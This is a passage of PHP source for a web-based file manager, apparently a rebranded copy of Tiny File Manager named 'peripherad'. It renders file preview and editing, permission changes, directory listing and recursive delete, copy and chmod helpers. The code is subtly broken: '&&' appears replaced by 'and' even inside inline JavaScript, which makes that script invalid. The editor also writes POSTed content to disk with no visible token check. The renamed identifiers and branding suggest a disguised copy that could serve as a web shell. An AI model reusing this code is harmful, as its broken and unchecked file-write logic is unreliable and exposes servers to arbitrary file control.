                echo '<div class="preview-video"><video src="' . fanco($file_url) . '" width="640" height="360" controls preload="metadata"></video></div>';
            } elseif ($is_text) {
                if (FM_USE_HIGHLIGHTJS) {
                    // highlight
                    $hljs_classes = array(
                        'shtml' => 'xml',
                        'htaccess' => 'apache',
                        'phtml' => 'php',
                        'lock' => 'json',
                        'svg' => 'xml',
                    );
                    $hljs_class = isset($hljs_classes[$ext]) ? 'lang-' . $hljs_classes[$ext] : 'lang-' . $ext;
                    if (empty($ext) || in_array(strtolower($file), fm_get_text_names()) || preg_match('#\.min\.(css|js)$#i', $file)) {
                        $hljs_class = 'nohighlight';
                    }
                    $content = '<pre class="with-hljs"><code class="' . $hljs_class . '">' . fanco($content) . '</code></pre>';
                } elseif (in_array($ext, array('php', 'php4', 'php5', 'phtml', 'phps'))) {
                    // php highlight
                    $content = highlight_string($content, true);
                } else {
                    $content = '<pre>' . fanco($content) . '</pre>';
                }
                echo $content;
            }
            ?>
        </div>
    </div>
    <?php
        fm_show_footer();
    exit;
}

// file editor
if (isset($_GET['edit']) and !FM_READONLY) {
    $file = $_GET['edit'];
    $file = fm_clean_path($file, false);
    $file = str_replace('/', '', $file);
    if ($file == '' || !is_file($path . '/' . $file) || !fm_is_exclude_items($file)) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }
    $editFile = ' : <i><b>'. $file. '</b></i>';
    header('X-XSS-Protection:0');
    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . fm_convert_win((FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file);
    $file_path = $path . '/' . $file;

    // normal editer
    $isNormalEditor = true;
    if (isset($_GET['env'])) {
        if ($_GET['env'] == "ace") {
            $isNormalEditor = false;
        }
    }

    // Save File
    if (isset($_POST['savedata'])) {
        $writedata = $_POST['savedata'];
        $fd = fopen($file_path, "w");
        @fwrite($fd, $writedata);
        fclose($fd);
        fm_set_msg(lng('File Saved Successfully'));
    }

    $ext = strtolower(pathinfo($file_path, PATHINFO_EXTENSION));
    $mime_type = fm_get_mime_type($file_path);
    $filesize = filesize($file_path);
    $is_text = false;
    $content = ''; // for text

    if (in_array($ext, fm_get_text_exts()) || substr($mime_type, 0, 4) == 'text' || in_array($mime_type, fm_get_text_mimes())) {
        $is_text = true;
        $content = file_get_contents($file_path);
    }

    ?>
    <div class="path">
        <div class="row">
            <div class="col-xs-12 col-sm-5 col-lg-6 pt-1">
                <div class="btn-toolbar" role="toolbar">
                    <?php if (!$isNormalEditor) { ?>
                        <div class="btn-group js-ace-toolbar">
                            <button data-cmd="none" data-option="fullscreen" class="btn btn-sm btn-outline-secondary" id="js-ace-fullscreen" title="<?php echo lng('Fullscreen') ?>"><i class="fa fa-expand" title="<?php echo lng('Fullscreen') ?>"></i></button>
                            <button data-cmd="find" class="btn btn-sm btn-outline-secondary" id="js-ace-search" title="<?php echo lng('Search') ?>"><i class="fa fa-search" title="<?php echo lng('Search') ?>"></i></button>
                            <button data-cmd="undo" class="btn btn-sm btn-outline-secondary" id="js-ace-undo" title="<?php echo lng('Undo') ?>"><i class="fa fa-undo" title="<?php echo lng('Undo') ?>"></i></button>
                            <button data-cmd="redo" class="btn btn-sm btn-outline-secondary" id="js-ace-redo" title="<?php echo lng('Redo') ?>"><i class="fa fa-repeat" title="<?php echo lng('Redo') ?>"></i></button>
                            <button data-cmd="none" data-option="wrap" class="btn btn-sm btn-outline-secondary" id="js-ace-wordWrap" title="<?php echo lng('Word Wrap') ?>"><i class="fa fa-text-width" title="<?php echo lng('Word Wrap') ?>"></i></button>
                            <select id="js-ace-mode" data-type="mode" title="<?php echo lng('Select Document Type') ?>" class="btn-outline-secondary border-start-0 d-none d-md-block"><option>-- <?php echo lng('Select Mode') ?> --</option></select>
                            <select id="js-ace-theme" data-type="theme" title="<?php echo lng('Select Theme') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo lng('Select Theme') ?> --</option></select>
                            <select id="js-ace-fontSize" data-type="fontSize" title="<?php echo lng('Select Font Size') ?>" class="btn-outline-secondary border-start-0 d-none d-lg-block"><option>-- <?php echo lng('Select Font Size') ?> --</option></select>
                        </div>
                    <?php } ?>
                </div>
            </div>
            <div class="edit-file-actions col-xs-12 col-sm-7 col-lg-6 text-end pt-1">
                <a title="<?php echo lng('Back') ?>" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;view=<?php echo urlencode($file) ?>"><i class="fa fa-reply-all"></i> <?php echo lng('Back') ?></a>
                <a title="<?php echo lng('BackUp') ?>" class="btn btn-sm btn-outline-primary" href="javascript:void(0);" onclick="backup('<?php echo urlencode(trim(FM_PATH)) ?>','<?php echo urlencode($file) ?>')"><i class="fa fa-database"></i> <?php echo lng('BackUp') ?></a>
                <?php if ($is_text) { ?>
                    <?php if ($isNormalEditor) { ?>
                        <a title="Advanced" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>&amp;env=ace"><i class="fa fa-pencil-square-o"></i> <?php echo lng('AdvancedEditor') ?></a>
                        <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fanco($file_url) ?>" onclick="edit_save(this,'nrl')"><i class="fa fa-floppy-o"></i> Save
                        </button>
                    <?php } else { ?>
                        <a title="Plain Editor" class="btn btn-sm btn-outline-primary" href="?p=<?php echo urlencode(trim(FM_PATH)) ?>&amp;edit=<?php echo urlencode($file) ?>"><i class="fa fa-text-height"></i> <?php echo lng('NormalEditor') ?></a>
                        <button type="button" class="btn btn-sm btn-success" name="Save" data-url="<?php echo fanco($file_url) ?>" onclick="edit_save(this,'ace')"><i class="fa fa-floppy-o"></i> <?php echo lng('Save') ?>
                        </button>
                    <?php } ?>
                <?php } ?>
            </div>
        </div>
        <?php
        if ($is_text and $isNormalEditor) {
            echo '<textarea class="mt-2" id="normal-editor" rows="33" cols="120" style="width: 99.5%;">' . htmlspecialchars($content) . '</textarea>';
            echo '<script>document.addEventListener("keydown", function(e) {if ((window.navigator.platform.match("Mac") ? e.metaKey : e.ctrlKey)  and e.keyCode == 83) { e.preventDefault();edit_save(this,"nrl");}}, false);</script>';
        } elseif ($is_text) {
            echo '<div id="editor" contenteditable="true">' . htmlspecialchars($content) . '</div>';
        } else {
            fm_set_msg(lng('FILE EXTENSION HAS NOT SUPPORTED'), 'error');
        }
        ?>
    </div>
    <?php
    fm_show_footer();
    exit;
}

if (isset($_GET['chmod']) and !FM_READONLY and !FM_IS_WIN) {
    $file = $_GET['chmod'];
    $file = fm_clean_path($file);
    $file = str_replace('/', '', $file);
    if ($file == '' || (!is_file($path . '/' . $file) and !is_dir($path . '/' . $file))) {
        fm_set_msg(lng('File not found'), 'error');
        $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH));
    }

    fm_show_header(); // HEADER
    fm_show_nav_path(FM_PATH); // current path

    $file_url = FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $file;
    $file_path = $path . '/' . $file;

    $mode = fileperms($path . '/' . $file);
    ?>
    <div class="path">
        <div class="card mb-2 <?php echo fm_get_theme(); ?>">
            <h6 class="card-header">
                <?php echo lng('ChangePermissions') ?>
            </h6>
            <div class="card-body">
                <p class="card-text">
                    <?php $display_path = fm_get_display_path($file_path); ?>
                    <?php echo $display_path['label']; ?>: <?php echo $display_path['path']; ?><br>
                </p>
                <form action="" method="post">
                    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
                    <input type="hidden" name="chmod" value="<?php echo fanco($file) ?>">

                    <table class="table compact-table <?php echo fm_get_theme(); ?>">
                        <tr>
                            <td></td>
                            <td><b><?php echo lng('Owner') ?></b></td>
                            <td><b><?php echo lng('Group') ?></b></td>
                            <td><b><?php echo lng('Other') ?></b></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Read') ?></b></td>
                            <td><label><input type="checkbox" name="ur" value="1"<?php echo ($mode & 00400) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gr" value="1"<?php echo ($mode & 00040) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="or" value="1"<?php echo ($mode & 00004) ? ' checked' : '' ?>></label></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Write') ?></b></td>
                            <td><label><input type="checkbox" name="uw" value="1"<?php echo ($mode & 00200) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gw" value="1"<?php echo ($mode & 00020) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="ow" value="1"<?php echo ($mode & 00002) ? ' checked' : '' ?>></label></td>
                        </tr>
                        <tr>
                            <td style="text-align: right"><b><?php echo lng('Execute') ?></b></td>
                            <td><label><input type="checkbox" name="ux" value="1"<?php echo ($mode & 00100) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="gx" value="1"<?php echo ($mode & 00010) ? ' checked' : '' ?>></label></td>
                            <td><label><input type="checkbox" name="ox" value="1"<?php echo ($mode & 00001) ? ' checked' : '' ?>></label></td>
                        </tr>
                    </table>

                    <p>
                       <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>"> 
                        <b><a href="?p=<?php echo urlencode(FM_PATH) ?>" class="btn btn-outline-primary"><i class="fa fa-times-circle"></i> <?php echo lng('Cancel') ?></a></b>&nbsp;
                        <button type="submit" class="btn btn-success"><i class="fa fa-check-circle"></i> <?php echo lng('Change') ?></button>
                    </p>
                </form>
            </div>
        </div>
    </div>
    <?php
    fm_show_footer();
    exit;
}

fm_show_header(); // HEADER
fm_show_nav_path(FM_PATH); // current path

fm_show_message();

$num_files = count($files);
$num_folders = count($folders);
$all_files_size = 0;
$tableTheme = (FM_THEME == "dark") ? "text-white bg-dark table-dark" : "bg-white";
?>
<form action="" method="post" class="pt-3">
    <input type="hidden" name="p" value="<?php echo fanco(FM_PATH) ?>">
    <input type="hidden" name="group" value="1">
    <input type="hidden" name="token" value="<?php echo $_SESSION['token']; ?>">
    <div class="table-responsive">
        <table class="table table-bordered table-hover table-sm <?php echo $tableTheme; ?>" id="main-table">
            <thead class="thead-white">
            <tr>
                <?php if (!FM_READONLY): ?>
                    <th style="width:3%" class="custom-checkbox-header">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="js-select-all-items" onclick="checkbox_toggle()">
                            <label class="custom-control-label" for="js-select-all-items"></label>
                        </div>
                    </th><?php endif; ?>
                <th><?php echo lng('Name') ?></th>
                <th><?php echo lng('Size') ?></th>
                <th><?php echo lng('Modified') ?></th>
                <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                    <th><?php echo lng('Perms') ?></th>
                    <th><?php echo lng('Owner') ?></th><?php endif; ?>
                <th><?php echo lng('Actions') ?></th>
            </tr>
            </thead>
            <?php
            if ($parent !== false) {
                ?>
                <tr><?php if (!FM_READONLY): ?>
                    <td class="nosort"></td><?php endif; ?>
                    <td class="border-0" data-sort><a href="?p=<?php echo urlencode($parent) ?>"><i class="fa fa-chevron-circle-left go-back"></i> ..</a></td>
                    <td class="border-0" data-order></td>
                    <td class="border-0" data-order></td>
                    <td class="border-0"></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols) { ?>
                        <td class="border-0"></td>
                        <td class="border-0"></td>
                    <?php } ?>
                </tr>
                <?php
            }
            $uu = 3399;
            foreach ($folders as $f) {
                $is_link = is_link($path . '/' . $f);
                $img = $is_link ? 'icon-link_folder' : 'fa fa-folder-o';
                $modif_raw = filemtime($path . '/' . $f);
                $modif = date(FM_DATETIME_FORMAT, $modif_raw);
                $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw));
                $filesize_raw = "";
                $filesize = lng('Folder');
                $perms = substr(decoct(fileperms($path . '/' . $f)), -4);
                if (function_exists('posix_getpwuid') and function_exists('posix_getgrgid')) {
                    $owner = posix_getpwuid(fileowner($path . '/' . $f));
                    $group = posix_getgrgid(filegroup($path . '/' . $f));
                    if ($owner === false) {
                        $owner = array('name' => '?');
                    }
                    if ($group === false) {
                        $group = array('name' => '?');
                    }
                } else {
                    $owner = array('name' => '?');
                    $group = array('name' => '?');
                }
                ?>
                <tr>
                    <?php if (!FM_READONLY): ?>
                        <td class="custom-checkbox-td">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="<?php echo $uu ?>" name="file[]" value="<?php echo fanco($f) ?>">
                            <label class="custom-control-label" for="<?php echo $uu ?>"></label>
                        </div>
                        </td><?php endif; ?>
                    <td data-sort=<?php echo fm_convert_win(fanco($f)) ?>>
                        <div class="filename"><a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fanco($f)) ?>
                            </a><?php echo($is_link ? ' &rarr; <i>' . readlink($path . '/' . $f) . '</i>' : '') ?></div>
                    </td>
                    <td data-order="a-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT);?>">
                        <?php echo $filesize; ?>
                    </td>
                    <td data-order="a-<?php echo $date_sorting;?>"><?php echo $modif ?></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                        <td><?php if (!FM_READONLY): ?><a title="Change Permissions" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?>
                        </td>
                        <td><?php echo $owner['name'] . ':' . $group['name'] ?></td>
                    <?php endif; ?>
                    <td class="inline-actions"><?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Delete')?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, '1028','<?php echo lng('Delete').' '.lng('Folder'); ?>','<?php echo urlencode($f) ?>', this.href);"> <i class="fa fa-trash-o" aria-hidden="true"></i></a>
                            <a title="<?php echo lng('Rename')?>" href="#" onclick="rename('<?php echo fanco(addslashes(FM_PATH)) ?>', '<?php echo fanco(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o" aria-hidden="true"></i></a>
                            <a title="<?php echo lng('CopyTo')?>..." href="?p=&amp;copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o" aria-hidden="true"></i></a>
                        <?php endif; ?>
                        <a title="<?php echo lng('DirectLink')?>" href="<?php echo fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f . '/') ?>" target="_blank"><i class="fa fa-link" aria-hidden="true"></i></a>
                    </td>
                </tr>
                <?php
                flush();
                $uu++;
            }
            $ik = 6070;
            foreach ($files as $f) {
                $is_link = is_link($path . '/' . $f);
                $img = $is_link ? 'fa fa-file-text-o' : fm_get_file_icon_class($path . '/' . $f);
                $modif_raw = filemtime($path . '/' . $f);
                $modif = date(FM_DATETIME_FORMAT, $modif_raw);
                $date_sorting = strtotime(date("F d Y H:i:s.", $modif_raw));
                $filesize_raw = fm_get_size($path . '/' . $f);
                $filesize = fm_get_filesize($filesize_raw);
                $filelink = '?p=' . urlencode(FM_PATH) . '&amp;view=' . urlencode($f);
                $all_files_size += $filesize_raw;
                $perms = substr(decoct(fileperms($path . '/' . $f)), -4);
                if (function_exists('posix_getpwuid') and function_exists('posix_getgrgid')) {
                    $owner = posix_getpwuid(fileowner($path . '/' . $f));
                    $group = posix_getgrgid(filegroup($path . '/' . $f));
                    if ($owner === false) {
                        $owner = array('name' => '?');
                    }
                    if ($group === false) {
                        $group = array('name' => '?');
                    }
                } else {
                    $owner = array('name' => '?');
                    $group = array('name' => '?');
                }
                ?>
                <tr>
                    <?php if (!FM_READONLY): ?>
                        <td class="custom-checkbox-td">
                        <div class="custom-control custom-checkbox">
                            <input type="checkbox" class="custom-control-input" id="<?php echo $ik ?>" name="file[]" value="<?php echo fanco($f) ?>">
                            <label class="custom-control-label" for="<?php echo $ik ?>"></label>
                        </div>
                        </td><?php endif; ?>
                    <td data-sort=<?php echo fanco($f) ?>>
                        <div class="filename">
                        <?php
                           if (in_array(strtolower(pathinfo($f, PATHINFO_EXTENSION)), array('gif', 'jpg', 'jpeg', 'png', 'bmp', 'ico', 'svg', 'webp', 'avif'))): ?>
                                <?php $imagePreview = fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f); ?>
                                <a href="<?php echo $filelink ?>" data-preview-image="<?php echo $imagePreview ?>" title="<?php echo fanco($f) ?>">
                           <?php else: ?>
                                <a href="<?php echo $filelink ?>" title="<?php echo $f ?>">
                            <?php endif; ?>
                                    <i class="<?php echo $img ?>"></i> <?php echo fm_convert_win(fanco($f)) ?>
                                </a>
                                <?php echo($is_link ? ' &rarr; <i>' . readlink($path . '/' . $f) . '</i>' : '') ?>
                        </div>
                    </td>
                    <td data-order="b-<?php echo str_pad($filesize_raw, 18, "0", STR_PAD_LEFT); ?>"><span title="<?php printf('%s bytes', $filesize_raw) ?>">
                        <?php echo $filesize; ?>
                        </span></td>
                    <td data-order="b-<?php echo $date_sorting;?>"><?php echo $modif ?></td>
                    <?php if (!FM_IS_WIN and !$hide_Cols): ?>
                        <td><?php if (!FM_READONLY): ?><a title="<?php echo 'Change Permissions' ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;chmod=<?php echo urlencode($f) ?>"><?php echo $perms ?></a><?php else: ?><?php echo $perms ?><?php endif; ?>
                        </td>
                        <td><?php echo fanco($owner['name'] . ':' . $group['name']) ?></td>
                    <?php endif; ?>
                    <td class="inline-actions">
                        <?php if (!FM_READONLY): ?>
                            <a title="<?php echo lng('Delete') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;del=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1209, '<?php echo lng('Delete').' '.lng('File'); ?>','<?php echo urlencode($f); ?>', this.href);"> <i class="fa fa-trash-o"></i></a>
                            <a title="<?php echo lng('Rename') ?>" href="#" onclick="rename('<?php echo fanco(addslashes(FM_PATH)) ?>', '<?php echo fanco(addslashes($f)) ?>');return false;"><i class="fa fa-pencil-square-o"></i></a>
                            <a title="<?php echo lng('CopyTo') ?>..."
                               href="?p=<?php echo urlencode(FM_PATH) ?>&amp;copy=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="fa fa-files-o"></i></a>
                        <?php endif; ?>
                        <a title="<?php echo lng('DirectLink') ?>" href="<?php echo fanco(FM_ROOT_URL . (FM_PATH != '' ? '/' . FM_PATH : '') . '/' . $f) ?>" target="_blank"><i class="fa fa-link"></i></a>
                        <a title="<?php echo lng('Download') ?>" href="?p=<?php echo urlencode(FM_PATH) ?>&amp;dl=<?php echo urlencode($f) ?>" onclick="confirmDailog(event, 1211, '<?php echo lng('Download'); ?>','<?php echo urlencode($f); ?>', this.href);"><i class="fa fa-download"></i></a>
                    </td>
                </tr>
                <?php
                flush();
                $ik++;
            }

            if (empty($folders) and empty($files)) { ?>
                <tfoot>
                    <tr><?php if (!FM_READONLY): ?>
                            <td></td><?php endif; ?>
                        <td colspan="<?php echo (!FM_IS_WIN and !$hide_Cols) ? '6' : '4' ?>"><em><?php echo lng('Folder is empty') ?></em></td>
                    </tr>
                </tfoot>
                <?php
            } else { ?>
                <tfoot>
                    <tr>
                        <td class="gray" colspan="<?php echo (!FM_IS_WIN and !$hide_Cols) ? (FM_READONLY ? '6' :'7') : (FM_READONLY ? '4' : '5') ?>">
                            <?php echo lng('FullSize').': <span class="badge text-bg-light border-radius-0">'.fm_get_filesize($all_files_size).'</span>' ?>
                            <?php echo lng('File').': <span class="badge text-bg-light border-radius-0">'.$num_files.'</span>' ?>
                            <?php echo lng('Folder').': <span class="badge text-bg-light border-radius-0">'.$num_folders.'</span>' ?>
                        </td>
                    </tr>
                </tfoot>
                <?php } ?>
        </table>
    </div>

    <div class="row">
        <?php if (!FM_READONLY): ?>
        <div class="col-xs-12 col-sm-9">
            <ul class="list-inline footer-action">
                <li class="list-inline-item"> <a href="#/select-all" class="btn btn-small btn-outline-primary btn-2" onclick="select_all();return false;"><i class="fa fa-check-square"></i> <?php echo lng('SelectAll') ?> </a></li>
                <li class="list-inline-item"><a href="#/unselect-all" class="btn btn-small btn-outline-primary btn-2" onclick="unselect_all();return false;"><i class="fa fa-window-close"></i> <?php echo lng('UnSelectAll') ?> </a></li>
                <li class="list-inline-item"><a href="#/invert-all" class="btn btn-small btn-outline-primary btn-2" onclick="invert_all();return false;"><i class="fa fa-th-list"></i> <?php echo lng('InvertSelection') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="delete" id="a-delete" value="Delete" onclick="return confirm('<?php echo lng('Delete selected files and folders?'); ?>')">
                    <a href="javascript:document.getElementById('a-delete').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-trash"></i> <?php echo lng('Delete') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="zip" id="a-zip" value="zip" onclick="return confirm('<?php echo lng('Create archive?'); ?>')">
                    <a href="javascript:document.getElementById('a-zip').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Zip') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="tar" id="a-tar" value="tar" onclick="return confirm('<?php echo lng('Create archive?'); ?>')">
                    <a href="javascript:document.getElementById('a-tar').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-file-archive-o"></i> <?php echo lng('Tar') ?> </a></li>
                <li class="list-inline-item"><input type="submit" class="hidden" name="copy" id="a-copy" value="Copy">
                    <a href="javascript:document.getElementById('a-copy').click();" class="btn btn-small btn-outline-primary btn-2"><i class="fa fa-files-o"></i> <?php echo lng('Copy') ?> </a></li>
            </ul>
        </div>
        <div class="col-3 d-none d-sm-block"><a href="." target="_blank" class="float-right text-muted">peripherad <?php echo VERSION; ?></a></div>
        <?php else: ?>
            <div class="col-12"><a href="." target="_blank" class="float-right text-muted">peripherad <?php echo VERSION; ?></a></div>
        <?php endif; ?>
    </div>
</form>

<?php
fm_show_footer();


function print_external($key) {
    global $external;

    if(!array_key_exists($key, $external)) {
        // throw new Exception('Key missing in external: ' . key);
        echo "<!-- EXTERNAL: MISSING KEY $key -->";
        return;
    }

    echo "$external[$key]";
}


function verifyToken($token) 
{
    if (hash_equals($_SESSION['token'], $token)) { 
        return true;
    }
    return false;
}

/**
 * Delete  file or folder (recursively)
 * @param string $path
 * @return bool
 */
function fm_rdelete($path)
{
    if (is_link($path)) {
        return unlink($path);
    } elseif (is_dir($path)) {
        $objects = scandir($path);
        $ok = true;
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rdelete($path . '/' . $file)) {
                        $ok = false;
                    }
                }
            }
        }
        return ($ok) ? rmdir($path) : false;
    } elseif (is_file($path)) {
        return unlink($path);
    }
    return false;
}


function fm_rchmod($path, $filemode, $dirmode)
{
    if (is_dir($path)) {
        if (!chmod($path, $dirmode)) {
            return false;
        }
        $objects = scandir($path);
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rchmod($path . '/' . $file, $filemode, $dirmode)) {
                        return false;
                    }
                }
            }
        }
        return true;
    } elseif (is_link($path)) {
        return true;
    } elseif (is_file($path)) {
        return chmod($path, $filemode);
    }
    return false;
}


function fm_is_valid_ext($filename)
{
    $allowed = (FM_FILE_EXTENSION) ? explode(',', FM_FILE_EXTENSION) : false;

    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;

    return ($isFileAllowed) ? true : false;
}


function fm_rename($old, $new)
{
    $isFileAllowed = fm_is_valid_ext($new);

    if(!is_dir($old)) {
        if (!$isFileAllowed) return false;
    }

    return (!file_exists($new) and file_exists($old)) ? rename($old, $new) : null;
}


function fm_rcopy($path, $dest, $upd = true, $force = true)
{
    if (is_dir($path)) {
        if (!fm_mkdir($dest, $force)) {
            return false;
        }
        $objects = scandir($path);
        $ok = true;
        if (is_array($objects)) {
            foreach ($objects as $file) {
                if ($file != '.' and $file != '..') {
                    if (!fm_rcopy($path . '/' . $file, $dest . '/' . $file)) {
                        $ok = false;
                    }
                }
            }
        }
        return $ok;
    } elseif (is_file($path)) {
        return fm_copy($path, $dest, $upd);
    }
    return false;
}


function fm_mkdir($dir, $force)
{
    if (file_exists($dir)) {
        if (is_dir($dir)) {
            return $dir;
        } elseif (!$force) {
            return false;
        }
        unlink($dir);
    }
    return mkdir($dir, 0777, true);
}


function fm_copy($f1, $f2, $upd)
{
    $time1 = filemtime($f1);
    if (file_exists($f2)) {
        $time2 = filemtime($f2);
        if ($time2 >= $time1 and $upd) {
            return false;
        }
    }
    $ok = copy($f1, $f2);
    if ($ok) {
        touch($f2, $time1);
    }
    return $ok;
}


function fm_get_mime_type($file_path)
{
    if (function_exists('finfo_open')) {
        $finfo = finfo_open(FILEINFO_MIME_TYPE);
        $mime = finfo_file($finfo, $file_path);
        finfo_close($finfo);
        return $mime;
    } elseif (function_exists('mime_content_type')) {
        return mime_content_type($file_path);
    } elseif (!stristr(ini_get('disable_functions'), 'shell_exec')) {
        $file = escapeshellarg($file_path);
        $mime = shell_exec('file -bi ' . $file);
        return $mime;
    } else {
        return '--';
    }
}


function fm_redirect($url, $code = 302)
{
    header('Location: ' . $url, true, $code);
    exit;
}


function get_absolute_path($path) {
    $path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
    $parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen');
    $absolutes = array();
    foreach ($parts as $part) {
        if ('.' == $part) continue;
        if ('..' == $part) {
            array_pop($absolutes);
        } else {
            $absolutes[] = $part;
        }
    }
    return implode(DIRECTORY_SEPARATOR, $absolutes);
}


function fm_clean_path($path, $trim = true)
{
    $path = $trim ? trim($path) : $path;
    $path = trim($path, '\\/');
    $path = str_replace(array('../', '..\\'), '', $path);
    $path =  get_absolute_path($path);
    if ($path == '..') {
        $path = '';
    }
    return str_replace('\\', '/', $path);
}


function fm_get_parent_path($path)
{
    $path = fm_clean_path($path);
    if ($path != '') {
        $array = explode('/', $path);
        if (count($array) > 1) {
            $array = array_slice($array, 0, -1);
            return implode('/', $array);
        }
        return '';
    }
    return false;
}

function fm_get_display_path($file_path)
{
    global $path_display_mode, $root_path, $root_url;
    switch ($path_display_mode) {
        case 'relative':
            return array(
                'label' => 'Path',
                'path' => fanco(fm_convert_win(str_replace($root_path, '', $file_path)))
            );
        case 'host':
            $relative_path = str_replace($root_path, '', $file_path);
            return array(
                'label' => 'Host Path',
                'path' => fanco(fm_convert_win('/' . $root_url . '/' . ltrim(str_replace('\\', '/', $relative_path), '/')))
            );
        case 'full':
        default:
            return array(
                'label' => 'Full Path',
                'path' => fanco(fm_convert_win($file_path))
            );
    }
}


function fm_is_exclude_items($file) {
    $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
    if (isset($exclude_items) and sizeof($exclude_items)) {
        unset($exclude_items);
    }

    $exclude_items = FM_EXCLUDE_ITEMS;
    if (version_compare(PHP_VERSION, '7.0.0', '<')) {
        $exclude_items = unserialize($exclude_items);
    }
    if (!in_array($file, $exclude_items) and !in_array("*.$ext", $exclude_items)) {
        return true;
    }
    return false;
}


function fm_get_translations($tr) {
    try {
        $content = @file_get_contents('translation.json');
        if($content !== FALSE) {
            $lng = json_decode($content, TRUE);
            global $lang_list;
            foreach ($lng["language"] as $key => $value)
            {
                $code = $value["code"];
                $lang_list[$code] = $value["name"];
                if ($tr)
                    $tr[$code] = $value["translation"];
            }
            return $tr;
        }

    }
    catch (Exception $e) {
        echo $e;
    }
}


function fm_get_size($file)
{
    static $iswin;
    static $isdarwin;
    if (!isset($iswin)) {
        $iswin = (strtoupper(substr(PHP_OS, 0, 3)) == 'WIN');
    }
    if (!isset($isdarwin)) {
        $isdarwin = (strtoupper(substr(PHP_OS, 0)) == "DARWIN");
    }

    static $exec_works;
    if (!isset($exec_works)) {
        $exec_works = (function_exists('exec') and !ini_get('safe_mode') and @exec('echo EXEC') == 'EXEC');
    }

    // try a shell command
    if ($exec_works) {
        $arg = escapeshellarg($file);
        $cmd = ($iswin) ? "for %F in (\"$file\") do @echo %~zF" : ($isdarwin ? "stat -f%z $arg" : "stat -c%s $arg");
        @exec($cmd, $output);
        if (is_array($output) and ctype_digit($size = trim(implode("\n", $output)))) {
            return $size;
        }
    }

    // try the Windows COM interface
    if ($iswin and class_exists("COM")) {
        try {
            $fsobj = new COM('Scripting.FileSystemObject');
            $f = $fsobj->GetFile( realpath($file) );
            $size = $f->Size;
        } catch (Exception $e) {
            $size = null;
        }
        if (ctype_digit($size)) {
            return $size;
        }
    }

    // if all else fails
    return filesize($file);
}


function fm_get_filesize($size)
{
    $size = (float) $size;
    $units = array('B', 'KB', 'MB', 'GB', 'TB', 'PB', 'EB', 'ZB', 'YB');
    $power = ($size > 0) ? floor(log($size, 1024)) : 0;
    $power = ($power > (count($units) - 1)) ? (count($units) - 1) : $power;
    return sprintf('%s %s', round($size / pow(1024, $power), 2), $units[$power]);
}


function fm_get_directorysize($directory) {
    $bytes = 0;
    $directory = realpath($directory);
    if ($directory !== false and $directory != '' and file_exists($directory)){
        foreach(new RecursiveIteratorIterator(new RecursiveDirectoryIterator($directory, FilesystemIterator::SKIP_DOTS)) as $file){
            $bytes += $file->getSize();
        }
    }
    return $bytes;
}


function fm_get_zif_info($path, $ext) {
